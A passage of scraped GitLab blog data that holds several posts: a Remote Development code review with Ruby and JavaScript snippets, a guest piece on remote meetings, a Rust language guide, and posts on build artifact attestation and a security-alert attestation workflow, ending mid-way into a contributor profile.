the concerns raised by Laura and implement the necessary preloading.\n\n#### Evaluating the potential N+1 impact\nChad provided insightful information about the low risk of real N+1 impact from two particular fields in the current implementation. He elaborated on how the queries for user and agent associations would largely be cache hits due to scoping and usage patterns. Chad diligently examined the cache hits happening in development, confirming the potential optimization.\n\nHere's a code snippet from the initial implementation:\n\n```ruby\n# Initial Implementation\nclass WorkspaceType \u003C BaseType\n  field :user, ::Types::UserType,\n    description: \"User associated with this workspace\",\n    null: true\n\n  field :agent, ::Types::AgentType,\n    description: \"Agent associated with this workspace\",\n    null: true\n\n  # Resolver for the user association\n  def user\n    object.user\n  end\n\n  # Resolver for the agent association\n  def agent\n    object.agent\n  end\nend\n```\n\n#### Treating performance as a priority\nBoth contributors acknowledged the significance of addressing the performance concern, with Laura emphasizing its importance. They agreed to prioritize the separate issue dedicated to resolving the N+1 queries and ensuring proper test coverage.\n\nHere's a code snippet from the revised implementation:\n\n```ruby\n# Revised Implementation with Preloading\nclass WorkspaceType \u003C BaseType\n  field :user, ::Types::UserType,\n    description: \"User associated with this workspace\",\n    null: true\n\n  field :agent, ::Types::AgentType,\n    description: \"Agent associated with this workspace\",\n    null: true\n\n  # Resolver for the user association with preloading\n  def user\n    ::Dataloader.for(::User).load(object.user_id)\n  end\n\n  # Resolver for the agent association with preloading\n  def agent\n    ::Dataloader.for(::Agent).load(object.agent_id)\n  end\nend\n```\n\n#### Considering future usage\nChad expressed excitement about the possibility of the new feature gaining significant usage. He humorously stated that encountering enough legitimate traffic on workspaces to trigger any performance impact would be a delightful problem to have, as it would indicate a growing user base.\n\n#### Collaboration and performance improvement\nThe code review exemplifies the collaborative and proactive approach of our team in optimizing the WorkspaceType. The team's dedication to addressing performance concerns ensures that our codebase remains performant and efficient, even as our user base grows.\n\n![BE2](https://about.gitlab.com/images/blogimages/remote-development/BE2.png){: .shadow.medium}\n\n## Frontend code review\nThe frontend code review process was managed by our resident `Create: IDE` frontend maintainers, [Paul Slaughter](https://gitlab.com/pslaughter) and [Enrique Alcátara](https://gitlab.com/ealcantara). Additionally, a significant portion of the new frontend UI code had already undergone separate reviews and was merged to master, contributing to the overall quality of the Remote Development feature.\n\n### Example: Collaborative code improvement for ApolloCache Mutators\nPaul started a thread on an old version of the diff related to `ee/spec/frontend/remote_development/pages/create_spec.js``. The code snippet in question involved creating a mock Apollo instance and writing queries to the cache.\n\n#### The initial implementation\nInitially, the code involved writing to the cache twice, which raised concerns among the maintainers, Paul and Enrique. Paul pointed out that the duplicate write was unintentional and wondered if the writeQuery was even necessary, given the removal of @client directives. However, he also acknowledged the need to test that the created workspace was added to the ApolloCache.\n\n```javascript\n// Initial Implementation\nconst buildMockApollo = () => {\n  // ... Other mock setup ...\n  \n  // Initial writeQuery for userWorkspacesQuery\n  mockApollo.clients.defaultClient.cache.writeQuery({\n    query: userWorkspacesQuery,\n    data: USER_WORKSPACES_QUERY_EMPTY_RESULT.data,\n  });\n\n  // ... Other mock setup ...\n};\n```\n\n#### Identifying a potential issue\nEnrique agreed that the duplicate write was unintentional and probably introduced during a rebase. He explained that pre-populating the cache with a user workspaces query empty result was essential for the mutator to have a place to add the workspace. However, he encountered difficulties in making the workaround work effectively in unit tests.\n\n#### Resolving the issue\nPaul highlighted the significance of pre-populating the cache with the user workspaces query empty result. He suggested leaving a comment to explain the necessity of the initial writeQuery, as it would be implicitly coupled to future writeQuery operations.\n\n```javascript\n// Resolving the Issue - Leaving a Comment\n// Pre-populate the cache with user workspaces query empty result to provide a place\n// for the mutator to add the Workspace later. This is needed for both test and production environments.\nmockApollo.clients.defaultClient.cache.writeQuery({\n  query: userWorkspacesQuery,\n  data: USER_WORKSPACES_QUERY_EMPTY_RESULT.data,\n});\n```\n\nHowever, upon further investigation, Paul discovered that the writeQuery might not be needed, and the issue might be a symptom of an underlying problem. He decided to open a separate thread to address this concern and indicated that he would work on a separate MR to handle it.\n\n```javascript\n// Resolving the Issue - Opening a Separate Thread and MR\n// Open a separate thread to discuss potential underlying issues.\n// Plan to work on a separate MR to handle it.\n// Stay tuned for updates!\n```\n\n![FE](https://about.gitlab.com/images/blogimages/remote-development/FE.png){: .shadow.medium}\n\n## What we learned\nAs part of the Remote Development team, we faced the challenge of merging the Remote Development Rails monolith integration branch to meet our ambitious release goal. We adapted to last-minute pivots and focused on minimizing risks during the review process. The successful merge brought us one step closer to benefiting GitLab users worldwide. We acknowledged areas for improvement and remained committed to refining the feature's quality. Our journey reflects our dedication to delivering results, embracing change, and pushing boundaries in the DevOps community. The release of the Remote Development feature in GitLab 16.0 is a significant milestone for GitLab, and we continue to iterate and grow, providing innovative solutions for developers worldwide.\n\nAn outcome of this process was an ongoing conversation to propose a [simplified review process for greenfield features](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/125117). Through this proposal, we aim to distill the lessons we learned during this experience and provide guidance to future teams facing similar challenges.\n\n## What is next for Remote Development?\nAfter the merge of the MR, several changes were implemented:\n- The first production tests were conducted to ensure the stability and functionality of the merged code.\n- Collaboration took place between the Dev Evangelism and Technical Marketing teams, focusing on [creating content](https://gitlab.com/groups/gitlab-com/marketing/developer-relations/-/epics/190). This collaboration aimed to troubleshoot any issues that arose during the merge.\n- Feedback from the community was taken into account, and changes were made to address the concerns raised. This feedback was incorporated into an [issue](https://gitlab.com/gitlab-org/gitlab/-/issues/410031) and influenced the overall roadmap and direction of the project.\n\nDo you want to [contribute to GitLab](/community/contribute/)? Come and join in the conversation in the `#contribute` channel on GitLab's [Discord](https://discord.gg/gitlab), or just pop in and say \"Hi.\"\n\n",[752,867,686,845,708,9],{"slug":4599,"featured":6,"template":689},"remote-development-beta","content:en-us:blog:remote-development-beta.yml","Remote Development Beta","en-us/blog/remote-development-beta.yml","en-us/blog/remote-development-beta",{"_path":4605,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4606,"content":4612,"config":4618,"_id":4620,"_type":14,"title":4621,"_source":16,"_file":4622,"_stem":4623,"_extension":19},"/en-us/blog/remote-work-done-right",{"title":4607,"description":4608,"ogTitle":4607,"ogDescription":4608,"noIndex":6,"ogImage":4609,"ogUrl":4610,"ogSiteName":673,"ogType":674,"canonicalUrls":4610,"schema":4611},"Remote work, done right","Guest author Nolan Myers hated conference calls. Here's how we changed his mind.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749679812/Blog/Hero%20Images/remote-work-done-right.jpg","https://about.gitlab.com/blog/remote-work-done-right","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Remote work, done right\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Nolan Myers\"}],\n        \"datePublished\": \"2018-03-16\",\n      }",{"title":4607,"description":4608,"authors":4613,"heroImage":4609,"date":4615,"body":4616,"category":2074,"tags":4617},[4614],"Nolan Myers","2018-03-16","\n\n_GitLab CEO Sid Sijbrandij occasionally sits down for a \"[pick your brain](/handbook/eba/ceo-scheduling/#pick-your-brain-meetings)\"\nmeeting with people seeking advice on open source, remote work, or discussion of other things related to GitLab._\n\nI’ve been on many terrible conference calls. The gentle voice telling me to enter my nine-digit pin, followed by the pound sign, feels like disappointment before the call even begins. That’s why I was so surprised to hear that GitLab – a company of over 200 people – runs without an office. How could anything get done when every meeting was remote?\n\n\u003C!-- more -->\n\nSeeing is believing, so I jumped at the opportunity to watch firsthand. What I learned convinced me that remote meetings can be just as good as in person, and maybe even better. Here’s what impressed me:\n\n### Video conference for all\n\nEveryone joined a Zoom call, each from their own computer. Most everyone had their cameras on, which gave enough visual cues to see their mood; sometimes even an understanding of who they are, like seeing a pool table or disassembled motorcycle behind them. The video format helped enforce some good meeting practices. Only one speaker at a time; a singular focus of attention, either a person or a shared screen. Meetings started on time, never having to wait for a previous group to clear a conference room. Having everyone join independently also worked much better than having a few people in a room and a few remotes, which inevitably creates a power-center in the room.\n\n>The video format helped enforce some good meeting practices: only one speaker at a time; a singular focus of attention\n\n### Create a live agenda in a shared document\n\nEach meeting started with an agenda in a shared Google Doc. They coupled this with a “write before you speak” etiquette. Anyone was welcome to speak, and added a brief summary of their question or comment into the shared doc before chiming in. This encouraged the speaker to be deliberate about their point, think about where in the flow it made most sense, and to know they’d get the floor when appropriate. It was kind of a marvel to see bullets and sub-bullets evolve during the meeting. A task owner typed “TODO: follow up” right as they said “I got it.” Even better, they were left with detailed meeting notes for posterity.\n\n>It was kind of a marvel to see bullets and sub-bullets evolve during the meeting. A task owner typed “TODO: follow up” right as they said “I got it.”\n\n### Embrace multitasking\n\nHow often have you heard that you should give a meeting your undivided attention? And how often have you actually believed it? GitLab embraces multitasking. Having everyone together ensures the right people are there for important conversations. But inevitably a packed meeting agenda will have sections more and less relevant to a variety of participants. Unlike in a room, a video call where someone tunes out for a bit doesn’t hamper the effectiveness of those focused on a conversation. The shared agenda let everyone know when they were needed, and each topic had the right people ready to contribute.\n\n### Caveats and considerations\n\nThis process felt like a miniature miracle to watch, but does need the right tools. GitLab relied on Zoom and it worked well. One external call used WebEx, and its longer latency led people accidentally to talk over one another. Google Docs was a must for the shared agenda. Everyone had set up a reasonable workspace with fast internet and a camera.\n\nI’d also add that I saw this work well for both update- and decision-oriented meetings. Would this approach support technical brainstorming meetings too? Sometimes drawing on a whiteboard works much better than typing, especially if you have a diagram. Zoom does have a whiteboard feature; perhaps with a Stylus you could do this as well as in person. I’m curious to see it in practice.\n\nWhen I first heard of GitLab’s remote-only hiring, I immediately saw the benefits of hiring in lower-rent locations and not paying for office space. I assumed that it cost some productivity through effective collaboration. Now I see video calls done right can beat all but the best traditional conference room meetings.\n\n## About the guest author\n\nNolan Myers advises startups on organizational development and customer success, leveraging his executive experience in building high-performing products and teams. He also has passions for classical music, fine cuisine, and urban design. Learn more on his [LinkedIn](https://linkedin.com/in/nolanmyers).\n\nPhoto by [Christin Hume](https://unsplash.com/photos/slbqShqAhEo) on [Unsplash](https://unsplash.com/)\n{: .note}\n",[2660,803,686,779,9],{"slug":4619,"featured":6,"template":689},"remote-work-done-right","content:en-us:blog:remote-work-done-right.yml","Remote Work Done Right","en-us/blog/remote-work-done-right.yml","en-us/blog/remote-work-done-right",{"_path":4625,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4626,"content":4631,"config":4636,"_id":4638,"_type":14,"title":4639,"_source":16,"_file":4640,"_stem":4641,"_extension":19},"/en-us/blog/rust-programming-language",{"title":4627,"description":4628,"ogTitle":4627,"ogDescription":4628,"noIndex":6,"ogImage":3122,"ogUrl":4629,"ogSiteName":673,"ogType":674,"canonicalUrls":4629,"schema":4630},"A guide to Rust programming language","Rust is a well-loved programming language but it is a mindset shift from options like C++. Here's a tutorial and an inside look at Rust code and its capabilities.","https://about.gitlab.com/blog/rust-programming-language","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"A guide to Rust programming language\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Valerie Silverthorne\"}],\n        \"datePublished\": \"2020-07-21\",\n      }",{"title":4627,"description":4628,"authors":4632,"heroImage":3122,"date":4633,"body":4634,"category":682,"tags":4635},[1273],"2020-07-21","\n\n## What is Rust?\n\nRust is an open source programming language that has been the \"most loved language\" on developer community Stack Overflow's annual survey for the last four years. While it's a popular language in that sense, only a very, _very_ small number of developers actually use Rust language today – a July 2020 look at the PYPL PopularitY of Programming Languages Index ranks it at number 18 with just .81% interest. (For comparison Python is at nearly 32% and Java is over 17%.)\n\nSo why the intense love of the Rust programming language? To put it simply, Rust coding was created to solve problems present in other languages and if you can take the time to unlock its (admittedly difficult) secrets, you're rewarded with cleaner, faster, and most importantly, safer code. Rust code resolves pain points that you see in countless other programming languages with far fewer downsides. Utilizing Rust allows developers to decide when they no longer need memory at the time of compilation which creates more efficiency around memory usage.\n\n[Antony Saba](/company/team/#asaba), a senior security engineer with Strategic Security at GitLab, recently talked about Rust during a company-wide series of meetings ([Contribute 2020](/events/gitlab-contribute/)). He speaks from experience as his last employer was a Rust-based company. \"Okay, so what's Rust's promise?\" Saba asked. \"Rust's promise is that it should be easier, and everybody should be able to fearlessly write at a systems level and not have to worry about memory safety or thread safety, or at least worry about it in the way that is supported by the language and the tools.\"\n\nLet's unpack what that means.\n\n## History of Rust programming language\n\nThe [open source Rust community](https://www.rust-lang.org) describes the language as fast, reliable and productive. \"Hundreds of companies around the world are using Rust in production for fast, low-resource cross-platform solutions,\" the organization says. Firefox and DropBox are two well-known users of Rust today, and Mozilla (creator of Firefox) was the first original supporter of Rust.\n\n### Who created Rust?\n\nRust code was originally developed as an open source project by software developer Graydon Hoare while working at Mozilla Research in 2006 and has been maintained by the Rust Foundation since 2021. It’s now one of the top drivers of the Rust programming language. \n\nThink of Rust as the answer to a data-rich problem that will likely need lots of computational cycles. Mozilla's [Rust documentation](https://research.mozilla.org/rust/) specifically calls out the language as ideal for \"game engines, operating systems, file systems, browser components and simulation engines for virtual reality.\"\n\n## Benefits of programming in Rust\n\nThe top benefit of Rust coding is its adept memory management. Although there are other programming languages that emphasize memory safety like Rust code, Rust handles the concept differently in that it doesn’t use a garbage collector as other programming languages do. Instead, Rust uses a borrow checker to track variable scope and object lifetime while simultaneously administering high-quality memory safety and stopping concurrent data races. \n\nThe benefits of programing in Rust don’t stop at memory management. It’s fast and reliable for creating web apps and creating cross-platform applications, and it can integrate with preexisting code. \n\nOne of the other major benefits of Rust programming language is that it is well-suited for projects that demand extremely high performance. Its ability to process large amounts of data and CPU-intensive operations makes it a strong competitor in the developer space. \n\nOther Rust feature benefits offer a list of features that makes it stand out from other programming languages. Here are some of the features:\n\n1. It’s more user-friendly.\n2. You’ll find high-quality documentation about the language.\n3. It has a better resolution of memory errors and concurrent programs than C and C++ languages.\n4. It’s incredibly fast and highly secure compared to other languages.\n\n## The Rust ecosystem\n\nThe [JetBrains 2021 Developer Ecosystem Report](https://www.jetbrains.com/lp/devecosystem-2021/rust/) found that Rust developers have mostly been using it for less than six months, and often reach for the language for \"hobby\" or personal projects. What are devs primarily writing with Rust? The report found command line interface tools, systems programming and web development were the most popular options.\n\nMany companies have started using Rust, though. In 2020, [Discord switched from Go to Rust](https://discord.com/blog/why-discord-is-switching-from-go-to-rust), and Shopify, Dropbox, AWS and many others use it as well. \n\n## The basics of Rust programming language\n\nRust is a bit of a hybrid, according to Mozilla's Rust documentation. Rust offers developers the syntax advantages of high-level languages with the \"control and performance of a low-level language,\" the documentation explains.\n\nRust is a statically typed language rather than a dynamic one. Though developers like to argue the merits of both, Rust, like popular TypeScript, eliminates the frustration of \"dynamic typing.\" Data is constrained and checked by a compiler so confusion is minimized. Rust programming also makes it very hard to ignore errors – Steve Donovan, author of [\"A Gentle Guide to Rust,\"](https://stevedonovan.github.io/rust-gentle-intro/) jokes it can be hard not to think the compiler is shouting at you when you make a mistake.\n\nDonovan identifies Rust's key principles as:\n\n* Strictly enforcing safe borrowing of data\n* Functions, methods, and closures to operate on data\n* Tuples, structs, and enums to aggregate data\n* Pattern matching to select and destructure data\n* Traits to define behaviour on data\n\n## Types of Rust coding\n\nRust treats values by breaking them down into \"types\" in order to handle the data appropriately. According to MIT's guide to Rust, there are a number of types that can be split into scalar or integer types. Scalar types will likely be familiar to those who work with other programming languages: characters, Booleans, floating-point numbers and integers. They all represent a single value. Compound types are what they sound like – multiple types together.  \n\n## Who uses Rust?\n\nAll of the guardrails mentioned lead to a language that can create fast-moving code with few things that slow it down. There's no runtime or garbage collection, making coding in Rust ideal for applications where memory usage is at a premium (like embedded devices). But if there is a place where Rust really stands out, it's security. Donovan points out that Rust is \"safe by default,\" unlike C or C++. No one can corrupt memory by default, he writes.\n\n## The Rust programming language and productive coding\n\nAfter three years of coding in Rust, Antony was quick to say he's probably more productive with the language than any other.\n\n\"I really do feel like Rust was the most productive language I've ever used,\" he says. \"Once you are doing everything in that functional style, you're writing less code, but it's still clearer, because you don't have temporary variables. They're a thing that you don't really end up using when you're writing code that way. So, to me, it's those little things that I get the productivity out of.\"\n\n## Rust can be touchy, but rewarding\n\nProductive, sure, but there's a learning curve with Rust.\n\n\"It's true the borrow checker is the hardest part,\" Antony says. \"But the thing is, once you get past that, there is a serious dopamine hit when that program compiles, because it means now you only have your own logic errors to deal with. Part of that pain is explicitly some of the things that you assume, and some of the little white lies that you tell yourself when you're starting, especially with a C program. Because when you start your C program, it's like, 'all right, I have a couple command line parameters, I don't really want to write all my functions just to pass them, so I'm just going to declare a couple global variables and shove them in there, and I'll clean it up later.' Right? It's one of those little lies we tell ourselves. But you can't have immutable global variables in Rust. It just won't let you. You have to wrap it – you may as well just do the functions right. They're going to use your command-line arguments. It's the same with thread safety. You kind of have to do that upfront, and you don't get to make that assumption.\"\n\n## Looking to the future of the Rust programming language\n\nRust has a bright future, even if it might not be as widespread as other languages, Antony explains. \"I don't think it's ever going to be as popular as Go, just because Google is Google, and there's a lot of places that Go is really good for,\" he says. \"But for those places where you really want that fearless development, I think it'll continue to have a strong hold there.\"\n\nWatch Antony's Rust demo in full here:\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube-nocookie.com/embed/INT_rGJr6JQ\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\n**Read more about programming languages:**\n\nCan we solve the [COBOL programmer shortage?](/blog/cobol-programmer-shortage/)\n\nWhy we use [Ruby on Rails](/blog/why-we-use-rails-to-build-gitlab/) to build GitLab\n\nHow [Modern C and C ++ work](/blog/conan-c-cpp-package-management-integration/)\n\nCover image by [Zsolt Palatinus](https://unsplash.com/@sunitalap) on [Unsplash](https://unsplash.com)\n{: .note}\n",[9,865,752],{"slug":4637,"featured":6,"template":689},"rust-programming-language","content:en-us:blog:rust-programming-language.yml","Rust Programming Language","en-us/blog/rust-programming-language.yml","en-us/blog/rust-programming-language",{"_path":4643,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4644,"content":4650,"config":4655,"_id":4657,"_type":14,"title":4658,"_source":16,"_file":4659,"_stem":4660,"_extension":19},"/en-us/blog/securing-the-software-supply-chain-through-automated-attestation",{"title":4645,"description":4646,"ogTitle":4645,"ogDescription":4646,"noIndex":6,"ogImage":4647,"ogUrl":4648,"ogSiteName":673,"ogType":674,"canonicalUrls":4648,"schema":4649},"Securing the software supply chain through automated attestation","Standards bodies want to know how orgs are protecting against software tampering. Learn how automating compliance attestation can help.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749667086/Blog/Hero%20Images/blog-compliance.jpg","https://about.gitlab.com/blog/securing-the-software-supply-chain-through-automated-attestation","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Securing the software supply chain through automated attestation\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sandra Gittlen\"}],\n        \"datePublished\": \"2022-08-10\",\n      }",{"title":4645,"description":4646,"authors":4651,"heroImage":4647,"date":4652,"body":4653,"category":865,"tags":4654},[862],"2022-08-10","\nSecuring the software supply chain is not a one-and-done proposition. Instead, organizations, especially those in the public sector, must level up their protections as governing bodies add to their security frameworks. If you need proof of this, look no further than the sudden emergence of attestation requirements.\n\nAttestation is [an authenticated statement](https://slsa.dev/attestation-model) (metadata) about a software artifact or collection of software artifacts. Attestation is a key feature of [SLSA](https://slsa.dev/)(Supply chain Levels for Software Artifacts) Certification Level 2, which requires organizations to protect against software tampering and add minimal build integrity guarantees. The concept of attestation, along with presenting a software bill of materials ([SBOM](https://gitlab.com/groups/gitlab-org/-/epics/858)), is featured prominently in the [NIST Secure Software Development Framework](/blog/comply-with-nist-secure-supply-chain-framework-with-gitlab/) and ISACA’s [Certified Information Security Auditor training](https://www.isaca.org/credentialing/cisa).\n\n“In the past few months and in the wake of high-profile security breaches, the major governing bodies have been laser-focused on attestation and the ability to provide a verified artifact from your continuous integration (CI) pipelines that show you’ve completed all your security scans in a way that would be acceptable and compliant with the standards they set forth,” says [Joel Krooswyk](https://gitlab.com/jkrooswyk), senior manager of solutions architects at GitLab.\n\n“While the government is certainly leading on these requirements, the need for attestation applies to everyone,” says [Sam White](https://gitlab.com/sam.white), principal product manager at GitLab. \n\n## The demand for attestation automation\n\nOrganizations might have previously felt comfortable performing periodic self-audits for compliance attestation, but [the stakes are now too high](/blog/biden-administration-celebrates-1-year-anniversary-of-eo-by-accelerating-software-supply-chain-security/) and public sector agencies, as well as private sector organizations, must consider automating this critical task, according to Krooswyk.\n\n“Until now, attestation has been a manual undertaking, which has been burdensome, expensive, and error-prone,” he says. “The more automation we can apply to attestation, and the more consistency we can incorporate from standards requirements, the better off software supply chain security will be and the more confidence we will have in development collaboration.”\n\nGitLab [introduced automated compliance attestation](https://docs.gitlab.com/ee/ci/runners/configure_runners.html#artifact-attestation) in Release 15.1. GitLab Runner can generate and produce attestation metadata for all build artifacts. To enable this feature, you must set the RUNNER_GENERATE_ARTIFACTS_METADATA environment variable to “true”. This variable can either be set globally or it can be set for individual jobs. The metadata is then rendered in a plain text .json file that’s stored with the artifact. \n\nLearn how to automatically generate GitLab SLSA Level 2 Build Artifact Attestation:\n\n\u003C!-- blank line -->\n\n\u003Cfigure class=\"video_container\">\n\n  \u003Ciframe src=\"https://www.youtube.com/embed/MlIdqrDgI8U\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\n\u003C/figure>\n\n\u003C!-- blank line -->\n\n## Building attestation into the development lifecycle\n\nSoftware development is a collaborative effort and organizations need to know that upstream dependencies have been built in a secure manner. “Not only do you need to know that the software has been developed without vulnerabilities, but that the machine that software was built on has not been compromised,” White says. “How can you know, without attestation, that the binary itself is authentic and that the risk has been minimized?” By automating attestation, organizations can help protect users of their software from code that has been injected with malware or build servers that have been overtaken.\n\n>Join us at [GitLab Commit 2022](/events/commit/) and connect with the ideas, technologies, and people that are driving DevOps and digital transformation.\n\n“If developers don’t have to worry about the setup or ongoing complexity of attestation, it will be a game-changer for the security industry, because you are validating right at the point of software development,” White says.\n\n## Next up: Integrated code signing and broader participation\n\nAs the public sector wades deeper into compliance, the next logical step is to introduce accountability through code signing. “Next, developers need to cryptographically sign both the build artifact and the attestation file,” White says. “This will add another layer of confidence in the build artifacts and the software supply chain overall.”\n\nAttestation also must become the norm upstream throughout the open source community. “Attestation is very much a network effect where the more people adopt it, the more effective it gets,” Krooswyk says. “Everyone needs to generate their own attestation at the point in time when they build their artifact.” \n\nKrooswyk adds that in addition to SBOM validation, he would like to see attestations expand to include all vulnerabilities that are known at the time a project is built. “We need a continuous ability to create a birth-to-death artifact history,” he says.\n\nAll users on a GitLab 15.1 or later release can get started with generating attestation for their build artifacts by setting `RUNNER_GENERATE_ARTIFACTS_METADATA: true` in their CI pipeline.  For a more comprehensive approach, users can take advantage of security approvals, code scanning, and compliance auditing by using GitLab Ultimate. To test out building a more overarching software supply chain security strategy, try GitLab Ultimate for free with a [30-day trial today](/free-trial/).\n",[685,865,9,184],{"slug":4656,"featured":6,"template":689},"securing-the-software-supply-chain-through-automated-attestation","content:en-us:blog:securing-the-software-supply-chain-through-automated-attestation.yml","Securing The Software Supply Chain Through Automated Attestation","en-us/blog/securing-the-software-supply-chain-through-automated-attestation.yml","en-us/blog/securing-the-software-supply-chain-through-automated-attestation",{"_path":4662,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4663,"content":4669,"config":4676,"_id":4678,"_type":14,"title":4679,"_source":16,"_file":4680,"_stem":4681,"_extension":19},"/en-us/blog/self-service-security-alert-handling-with-gitlabs-uam",{"title":4664,"description":4665,"ogTitle":4664,"ogDescription":4665,"noIndex":6,"ogImage":4666,"ogUrl":4667,"ogSiteName":673,"ogType":674,"canonicalUrls":4667,"schema":4668},"Self-service security alert handling with GitLab's UAM","The User Attestation Module automates security alerts by routing them directly to team members for verification, reducing manual SecOps work and enhancing audit trails.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749662080/Blog/Hero%20Images/AdobeStock_1097303277.jpg","https://about.gitlab.com/blog/self-service-security-alert-handling-with-gitlabs-uam","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Self-service security alert handling with GitLab's UAM\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Bala Allam\"},{\"@type\":\"Person\",\"name\":\"Matt Coons\"}],\n        \"datePublished\": \"2025-03-18\",\n      }",{"title":4664,"description":4665,"authors":4670,"heroImage":4666,"date":4673,"body":4674,"category":865,"tags":4675},[4671,4672],"Bala Allam","Matt Coons","2025-03-18","The [GitLab Security Operations team](https://handbook.gitlab.com/handbook/security/security-operations/) prioritizes automation that enables security engineers to focus on high-impact work rather than routine tasks that can be automated. A key innovation in this automation strategy is creation of the User Attestation Module (UAM), which allows GitLab team members to directly respond to and verify security alerts flagged as potentially malicious. When the [GUARD framework](https://about.gitlab.com/blog/automating-cybersecurity-threat-detections-with-gitlab-ci-cd/) detects suspicious activity, it routes the alert to the relevant team member for review. The team member can then attest whether they recognize and authorize the activity. Their response is recorded for audit purposes, and, based on their input, the system either closes the alert or escalates it to the Security Incident Response Team (SIRT).\n\nIn this article, you'll learn about the UAM and how it can benefit your DevSecOps environment.\n\n## How the User Attestation Module works\n\nThe UAM streamlines security alert handling through a comprehensive workflow that includes:\n\n* Alert verification by team members  \n* Collection and documentation of supporting evidence  \n* Option to request additional support from GitLab SecOps  \n* Secure storage of team member responses  \n* Automated alert resolution or incident escalation  \n* Team member feedback collection for continuous improvement\n\nWe created UAM to help us: \n\n1. Route low priority alerts (such as administrative activities) to the relevant team members who performed them.  \n2. Reduce alert fatigue by first checking with the team member who completed the activity before routing to SIRT if necessary.   \n3. Collect and store team member responses to maintain an audit trail and rich metrics.   \n4. Create a response tier between **SIRT needs to triage this alert** and **This is an informational signal that does not need to be reviewed directly**.\n\n## UAM's design principles\n\nThe UAM is a Slack-first automation that reaches out to team members to validate activity directly in Slack, reducing effort and increasing participation. Today, 40% of all security alerts are delivered to team members through the UAM, saving SIRT valuable time to focus on higher importance alerts and incidents. \n\nA robust escalation workflow in the UAM ensures that all alerts are validated by team members or escalated to SIRT. When a UAM alert reaches a team member, they have a period of time to respond attesting to the activity or stating they do not recognize the activity. If no response is recorded, the UAM alert is auto-escalated to SIRT for handling. \n\nComprehensive metrics collection is a core GUARD design principle, which extends to how we designed UAM. All user interactivity with triggered UAM alerts is logged in a metrics database, which enables comprehensive measurement to identify problematic alerts, opportunities for process improvement, and overall UAM health.\n\nUAM enables a third alert tier, bridging the gap between alerts that always needed to be investigated, and lower importance informational signals that are grouped by entity for escalation and correlation. \n\n- Stable alerts (must be triaged and investigated by SIRT)  \n- UAM alerts (routed to team members to attest to the activity)  \n- Informational signal (low-importance events that are interesting and correlated by entity grouping)\n\n## UAM components \n\nThe UAM framework consists of multiple components:\n\n- GitLab: Fetches a user email address based on user_id via user’s API and stores user's responses  - Slack: Searches each user by email using Slack API and posts a UAM notification to the end user as well as collects responses from users using Slack modals  \n- Tines: Processes and orchestrates user responses and alerts     \n- Devo: Receives alert payload and alert notifications  \n- Metrics DB: Records metrics for triggered UAM alerts\n\nThe workflow integrates with following modules:\n\n- GitLab API for user identification  \n- Slack API for user communication  \n- Webhook configuration for alert reception  \n- Audit trail storage in GitLab\n\n## UAM workflow\n\nThe diagram below illustrates the workflow of the UAM module:\n\n![UAM - flow chart](https://res.cloudinary.com/about-gitlab-com/image/upload/v1749674678/Blog/Content%20Images/UAM_detection_edited.png)\n\n## Following along with GUARD\n\nWe are still unveiling parts of GUARD and how it works, so [follow along](https://gitlab.com/gitlab-security-oss/guard) to learn how we automate our security detections from end to end.\n\n## Read more about the GUARD framework\n\n- [Unveiling the GUARD framework to automate security detections at GitLab](https://about.gitlab.com/blog/unveiling-the-guard-framework-to-automate-security-detections-at-gitlab/)  \n- [Automating cybersecurity threat detections with GitLab CI/CD](https://about.gitlab.com/blog/automating-cybersecurity-threat-detections-with-gitlab-ci-cd/)\n- [Open Source Security at GitLab](https://about.gitlab.com/security/open-source-resources/)",[865,752,482,1495,9],{"slug":4677,"featured":6,"template":689},"self-service-security-alert-handling-with-gitlabs-uam","content:en-us:blog:self-service-security-alert-handling-with-gitlabs-uam.yml","Self Service Security Alert Handling With Gitlabs Uam","en-us/blog/self-service-security-alert-handling-with-gitlabs-uam.yml","en-us/blog/self-service-security-alert-handling-with-gitlabs-uam",{"_path":4683,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4684,"content":4689,"config":4694,"_id":4696,"_type":14,"title":4697,"_source":16,"_file":4698,"_stem":4699,"_extension":19},"/en-us/blog/semyon-pupkov-contributor-post",{"title":4685,"description":4686,"ogTitle":4685,"ogDescription":4686,"noIndex":6,"ogImage":1192,"ogUrl":4687,"ogSiteName":673,"ogType":674,"canonicalUrls":4687,"schema":4688},"GitLab Code Contributor: Semyon Pupkov","Long-time contributor Semyon Pupkov shares why he loves contributing to GitLab.","https://about.gitlab.com/blog/semyon-pupkov-contributor-post","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab Code Contributor: Semyon Pupkov\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2019-01-30\",\n      }",{"title":4685,"description":4686,"authors":4690,"heroImage":1192,"date":4691,"body":4692,"category":10,"tags":4693},[704],"2019-01-30","\n\nFor this month's contributor post, I'm excited to introduce [Semyon Pupkov](https://gitlab.com/artofhuman), who's been a consistent contributor to GitLab since 2016. The graph below shows Semyon's merge requests (MRs) since GitLab 8.13. Let's get to know him!\n\n![Semyon's MRs](https://about.gitlab.com/images/blogimages/semyon-blogpost/semyon-mrs.png){: .small.center}\n\n### Can you tell us where you live and a little bit about your area?\n\nI live in 